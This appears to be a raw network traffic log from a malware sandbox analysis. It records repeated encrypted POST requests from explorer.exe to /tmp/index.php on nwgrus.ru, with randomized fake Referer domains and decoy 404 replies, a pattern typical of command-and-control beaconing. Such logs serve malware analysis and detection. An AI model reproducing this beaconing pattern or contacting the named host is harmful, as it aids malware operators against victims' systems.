                                                                            Oct 14, 2024 01:52:42.352502108 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://minslgtmvtn.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 114
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:42.352502108 CEST114OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 33 38 df ee
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu38`!c|O-^;3
                                                                            Oct 14, 2024 01:52:43.461736917 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:43 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.449751189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:43.505342960 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://ccnaltwqqqsxov.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 237
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:43.505342960 CEST237OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3d 07 c8 ad
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu=Zjo{5by2+m8&wxfAJZQ'VM.Jq"UHasWMEHSc!)IF?@vCL.qKX
                                                                            Oct 14, 2024 01:52:44.583055019 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:44 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.449752189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:44.594820976 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://stlewbfilnqojsrv.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 125
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:44.594852924 CEST125OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4e 09 dd e9
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuNo9M`_9*uqd]3
                                                                            Oct 14, 2024 01:52:45.700979948 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:45 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.449753189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:45.710191965 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://egmeddtwjwiedt.com/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 177
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:45.710191965 CEST177OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 65 54 df fc
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vueTG`Q3g"W1O]4}xh4-KFdKUbR1)Ey^C
                                                                            Oct 14, 2024 01:52:46.816863060 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:46 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.449754189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:46.826585054 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://gklgbytfsyxm.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 199
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:46.826607943 CEST199OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 3f 55 b1 ed
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu?UJYSd<pTe$ImUUREK]%ATwq7(<6%d:ZS#7
                                                                            Oct 14, 2024 01:52:47.921842098 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:47 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.449755189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:47.931195021 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://aovitjibeagnbys.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 345
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:47.931227922 CEST345OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 45 51 d5 ba
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuEQIlLyc"\$6aer[+=]07E3oxW.t?B(/|$K>E^Fl1aGu_Ek_uVCS2
                                                                            Oct 14, 2024 01:52:49.045856953 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:48 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.449756189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:49.054759026 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://snussmiqvhuxlm.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 268
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:49.054791927 CEST268OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 3f 4f fc 9c
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu?OLBUi9Ym94|ZhT#b5R,Sb`9J9AH55vBU8'C94kYf+HXirXD
                                                                            Oct 14, 2024 01:52:50.187657118 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:49 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.449757189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:50.201419115 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://lldjdgortos.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 116
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:50.201419115 CEST116OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 5b 5c ba ae
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu[\}&feYI<Ui
                                                                            Oct 14, 2024 01:52:51.527635098 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:51 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.449758189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:51.541734934 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://syoedasuherii.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 135
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:51.541734934 CEST135OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 3e 2f dd e5
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu>/T-DhxyRt*J>1LY8DUN
                                                                            Oct 14, 2024 01:52:52.671621084 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:52 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.449759189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:52.679179907 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://njefqjlwqiadunh.org/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 324
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:52.679209948 CEST324OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 27 05 ba 9a
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vu'mSqIJ]CMuVO@)kd60e(-Y hOq.-~o1&)GSH/Ju0'[`UMGl8a;I'
                                                                            Oct 14, 2024 01:52:53.788449049 CEST137INHTTP/1.1 200 OK
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:53 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.449760189.161.95.103802580C:\Windows\explorer.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 14, 2024 01:52:53.800121069 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Accept: */*
                                                                            Referer: http://tdojljspnss.net/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                            Content-Length: 166
                                                                            Host: nwgrus.ru
                                                                            Oct 14, 2024 01:52:53.800148964 CEST166OUTData Raw: 3b 6e 54 14 84 ca 69 52 d8 a3 b5 06 72 06 7c cc 0e 7a b9 e2 68 09 e5 60 79 7f 0b e2 37 b1 c3 1d e9 5d ce 29 06 6b 50 11 9b 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 5a 5d a6 8f
                                                                            Data Ascii: ;nTiRr|zh`y7])kP? 9Yt M@NA -[k,vuZ]kF8W~xiyE*gQwu62+~"RL:YHv3
                                                                            Oct 14, 2024 01:52:54.895823002 CEST484INHTTP/1.1 404 Not Found
                                                                            Server: nginx/1.26.0
                                                                            Date: Sun, 13 Oct 2024 23:52:54 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
